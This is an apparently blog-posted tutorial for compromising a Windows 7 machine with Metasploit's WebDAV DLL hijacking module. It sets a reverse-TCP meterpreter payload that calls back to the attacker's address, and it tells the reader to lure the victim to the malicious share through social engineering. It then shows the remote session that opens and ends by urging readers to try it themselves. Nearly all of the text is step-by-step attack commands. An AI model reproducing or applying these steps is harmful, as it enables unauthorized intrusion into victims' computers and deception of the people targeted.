Through this article, you will learn WebDAV
application DLL hijacking exploitation using Metasploit framework and try to
hack the victim through malicious code execution.
Attacker: Kali Linux
Target: Window 7 (torrent)
Let’s start!!!
Open the terminal and type
msfconsole to load metasploit
framework.
This module presents a
directory of file extensions that can lead to code execution when opened from
the share. The default EXTENSIONS option must be configured to specify a
vulnerable application type.
Use exploit/windows/browser/webdav_dll_hijacker
msf exploit(webdav_dll_hijacker) >set payload
windows/meterpreter/reverse_tcp
msf exploit(webdav_dll_hijacker) >set lhost 192.168.0.107
msf exploit(webdav_dll_hijacker) >set extensions torrent
msf exploit(webdav_dll_hijacker) >exploit
It
has generate a malicious code which you can perceive from screenshot the
highlighted text \\192.168.0.107\documents\, so now
being an attacker you are suggested to share this link to your targeted client
using social engineering.
Once
you have shared malicious code link to the client then must for your
meterpreter session, now when client will open the link he will be intended to
a document folder with many file extensions and attacker will receive his
meterpreter session.
Hence meterpreter session 1 opened successfully now we
are connected with target through port 4444.
msf exploit(webdav_dll_hijacker) >sessions 1
meterpreter>
sysinfo
NOW TRY YOURSELF
GOOD LUCK!!!
0 comments:
Post a Comment